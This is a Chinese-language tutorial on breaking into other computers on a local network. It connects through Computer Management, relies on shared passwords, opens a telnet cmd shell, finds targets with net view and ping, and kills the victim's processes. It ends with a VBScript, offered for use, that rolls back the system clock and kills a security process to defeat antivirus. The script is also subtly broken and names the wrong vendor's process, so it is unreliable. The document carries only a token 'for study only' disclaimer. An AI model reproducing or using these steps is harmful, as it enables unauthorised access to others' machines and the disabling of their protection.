局域网入侵方法和卡巴杀毒软件免杀技巧
在这里,我们将详细介绍一个简单的局域网入侵方法,该方法可以免杀卡巴这个杀毒软件。该方法可以让您轻松地访问对方的计算机,包括查看对方的进程、杀掉对方的进程、免杀卡巴杀毒软件等。
让我们来了解一下局域网的入侵方法。局域网入侵方法的第一步就是连接到对方的计算机。您可以右键单击我的电脑,然后点击管理,接着点击操作底下的连接到另外一个计算机。输入对方的 IP 地址或计算机名,然后双击您要进入的计算机。
如果您不知道对方的 IP 地址,可以点击浏览高级里的立即查找,就可以显示本局域网工作组内的计算机了。然后,您可以双击您要进入的计算机,呵呵一般局域网的计算机密码是一样的,所以不需要 NTLM 验证。
但是,如果您想访问对方的计算机,需要开启对方的 RPC 服务。您可以按照以下步骤开启 RPC 服务:开始-->设置-->控制面板-->管理工具-->服务,找到remote procedure call (rpc),双击打开,在"启动类型"里选择"自动"后,点击确定。最后重新启动电脑。
现在,您已经成功地连接到对方的计算机了。下一步,您可以使用 telnet 服务来访问对方的计算机。您可以在 cmd 底下输入 telnet 对方的 IP 地址,然后就可以看到对方的一个 cmdshell 了。
但是,如果您不知道对方的 IP 地址,怎么办?很简单,cmd 下输入 net view 可以查看到局域网计算机名,然后点鼠标右键标记您要的计算机名字选中,按下回车就复制到 cmd 的剪切板里了。然后,用 ping 命令 ping 粘贴您刚才复制的内容(直接点右键就出来了),然后就能看到您 ping 的 IP 地址了。
现在,您已经成功地访问到对方的计算机了。下一步,您可以使用各种命令来控制对方的计算机,例如查看对方的进程、杀掉对方的进程等。
例如,要查看对方的进程,可以使用 tasklist 命令。如果进程太多,看不完怎么办?可以使用 tasklist | more 命令来分页查看。如果您想杀掉对方的进程,可以使用 taskkill /f /im 进程名字 /t 命令,例如要杀掉 QQ 进程,可以使用 taskkill /f /im qq.exe /t 命令。
但是,如果您想免杀卡巴杀毒软件,需要使用一些特殊的技巧。卡巴杀毒软件可以检测到您的活动,所以您需要使用一些技巧来免杀卡巴。例如,您可以使用以下脚本来杀掉卡巴杀毒软件:
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_proCESs").instances_
if ps.Name="rfwsrv.exe" then
ws.run "ntsd -c q -p ps.handle",0
您可以将这些代码保存到一个文件中,例如 kill.vbs,然后运行这个脚本。这样,您就可以杀掉卡巴杀毒软件了。
这是一个简单的局域网入侵方法,可以让您轻松地访问对方的计算机,包括查看对方的进程、杀掉对方的进程、免杀卡巴杀毒软件等。但是,请注意,这些方法仅供学习和研究之用,请勿用于非法活动。